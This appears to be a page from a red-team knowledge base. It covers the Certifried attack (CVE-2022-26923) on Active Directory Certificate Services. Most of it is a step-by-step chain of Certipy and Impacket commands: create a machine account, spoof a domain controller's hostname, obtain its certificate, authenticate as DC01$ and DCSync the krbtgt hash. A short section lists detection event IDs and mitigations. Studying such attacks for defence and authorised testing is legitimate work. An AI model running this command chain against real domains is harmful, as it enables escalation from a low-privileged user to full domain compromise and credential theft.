attack-36-certifried-cve-2022-26923.md (4378B)
1 --- 2 title: "Attack #36 β Certifried (CVE-2022-26923)" 3 description: "Certifried (CVE-2022-26923) exploits a flaw in how Active Directory maps computer account certificates to machine accounts. An attacker can create a newβ¦" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "credential-access", "persistence"] 7 tools: ["Impacket", "Certipy"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Four/π’ Attack #36 β Certifried (CVE-2022-26923).md" 11 --- 12 # π’ Attack #36 β Certificate Persistence (Certifried / CVE-2022-26923) 13 14 *** 15 16 ## π How It Works 17 18 Certifried (CVE-2022-26923) exploits a flaw in how Active Directory maps computer account certificates to machine accounts. An attacker can create a new machine account (via MachineAccountQuota), change its `dNSHostName` attribute to match a Domain Controller's hostname, then request a Client Authentication certificate. The CA issues a certificate with the DC's hostname β allowing the attacker to authenticate as the DC and perform DCSync. 19 20 ### Attack Flow 21 22 ``` 23 1. Create machine account (FAKE$) via MachineAccountQuota 24 2. Change FAKE$'s dNSHostName to DC01.corp.local 25 3. Request a certificate using the Machine template 26 4. CA issues cert with DC01.corp.local in the SAN 27 5. Authenticate with the certificate β impersonate DC01$ 28 6. DCSync β domain compromise 29 ``` 30 31 *** 32 33 ## βοΈ Prerequisites 34 35 | Requirement | Detail | 36 |---|---| 37 | **MachineAccountQuota > 0** | Default is 10 β allows domain users to create computer accounts | 38 | **ADCS deployed with Machine template** | Standard deployment has this | 39 | **Unpatched DCs** | CVE-2022-26923 patched in May 2022 | 40 41 *** 42 43 ## π» Full Commands 44 45 ```bash 46 # ββ Step 1: Create machine account ββββββββββββββββββββββββββββββββββββββββββββ 47 certipy account create -u low_user@corp.local -p 'Password1' \ 48 -user 'FAKE$' -pass 'FakePass123!' -dc-ip 10.10.10.10 49 # Or: 50 addcomputer.py -computer-name 'FAKE$' -computer-pass 'FakePass123!' \ 51 -dc-ip 10.10.10.10 corp.local/low_user:'Password1' 52 53 # ββ Step 2: Change dNSHostName to match DC ββββββββββββββββββββββββββββββββββββ 54 certipy account update -u low_user@corp.local -p 'Password1' \ 55 -user 'FAKE$' -dns DC01.corp.local -dc-ip 10.10.10.10 56 57 # ββ Step 3: Request certificate for FAKE$ (with DC01 hostname) βββββββββββββββ 58 certipy req -u 'FAKE$@corp.local' -p 'FakePass123!' -ca CORP-CA \ 59 -template Machine -dc-ip 10.10.10.10 60 # CA issues cert with DC01.corp.local in SAN 61 62 # ββ Step 4: Restore dNSHostName (cleanup) βββββββββββββββββββββββββββββββββββββ 63 certipy account update -u low_user@corp.local -p 'Password1' \ 64 -user 'FAKE$' -dns FAKE.corp.local -dc-ip 10.10.10.10 65 66 # ββ Step 5: Authenticate as DC01$ βββββββββββββββββββββββββββββββββββββββββββββ 67 certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10 68 # Returns DC01$ NT hash 69 70 # ββ Step 6: DCSync ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 71 secretsdump.py corp.local/'DC01$'@DC01.corp.local \ 72 -hashes :<DC01_HASH> -just-dc-user krbtgt 73 ``` 74 75 *** 76 77 ## π‘οΈ Detection β Event IDs 78 79 | Event ID | Source | What to Look For | 80 |---|---|---| 81 | **4741** | Security Log (DC) | Computer account creation | 82 | **5136** | Security Log (DC) | dNSHostName attribute modification on computer object | 83 | **4886** | Security Log (CA) | Certificate enrollment for machine account | 84 85 *** 86 87 ## π Attack Chain Context 88 89 ``` 90 [Certifried] βββ Machine account cert abuse β DC impersonation β DCSync 91 β 92 ββββ π CVE-2022-26923 β patched May 2022 93 ββββ π» Low-priv β machine account β DC cert β full domain 94 ββββ π Defeated by: patch, set MAQ=0, monitor dNSHostName changes 95 ``` 96 97 *** 98 99 > β **Attack #36 β Certifried complete.** 100 101 *** 102 103 > π **Category 4 β ADCS Attacks is now COMPLETE (10/10 attacks).**